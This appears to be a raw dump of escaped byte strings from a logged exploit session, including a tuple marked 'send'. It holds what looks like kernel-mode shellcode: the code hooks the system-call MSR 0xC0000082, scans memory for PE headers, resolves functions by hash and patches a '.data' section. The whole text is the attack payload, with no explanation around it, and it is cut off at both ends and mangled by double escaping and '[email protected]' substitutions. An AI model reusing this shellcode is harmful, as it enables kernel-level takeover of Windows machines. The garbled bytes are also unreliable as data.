\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 17, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0